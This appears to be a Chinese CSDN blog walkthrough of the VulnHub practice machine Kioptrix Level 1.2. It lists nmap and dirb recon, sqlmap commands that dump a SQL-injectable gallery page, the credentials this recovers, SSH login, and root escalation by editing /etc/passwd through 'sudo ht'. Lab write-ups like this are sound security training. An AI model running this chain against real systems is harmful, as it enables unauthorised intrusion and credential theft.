VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2

环境下载

戳此进行环境下载

KIOPTRIX: LEVEL 1靶机搭建

将下载好的靶机导入Vmware,网络连接设置为NAT模式即可

渗透测试

信息搜集

用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l
得到目标靶机的IP为:192.168.246.135

在这里插入图片描述

用Nmap探测一下目标靶机IP的端口信息:sudo nmap -sS -A 192.168.246.135,发现开放了22和80两个端口

在这里插入图片描述

用dirb扫描一下web目录:dirb http://192.168.246.135

在这里插入图片描述

漏洞挖掘

测试后发现需要添加一个host

在这里插入图片描述

发现http://192.168.246.135/gallery/gallery.php?id=1存在SQL注入漏洞

在这里插入图片描述

利用sqlmap得到数据库名:sqlmap -u http://192.168.246.135/gallery/gallery.php?id=1 --dbs

在这里插入图片描述

利用sqlmap得到gallery数据库中的表名:sqlmap -u http://192.168.246.135/gallery/gallery.php?id=1 -D gallery --tables

在这里插入图片描述

利用sqlmap得到gallery数据库中的表名:sqlmap -u http://192.168.246.135/gallery/gallery.php?id=1 -D gallery -T gallarific_users --columns

在这里插入图片描述

得到一组用户名和密码:admin:n0t7t1k4

在这里插入图片描述

在另一个表dev_accounts中,得到了两组用户名和密码

在这里插入图片描述

dreg:Mast3r
loneferret:starwars

getshell

利用上述得到的信息,发现后两组用户名和密码可以成功连接ssh

在这里插入图片描述

提权

查看/etc/passwd发现loneferret用户存在利用点

在这里插入图片描述

查看loneferret用户家目录下信息

在这里插入图片描述

根据提示,使用sudo ht命令,修改/etc/passwd中loneferret用户和root用户一样

在这里插入图片描述

重新连接ssh,发现成功提权到root用户

在这里插入图片描述

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值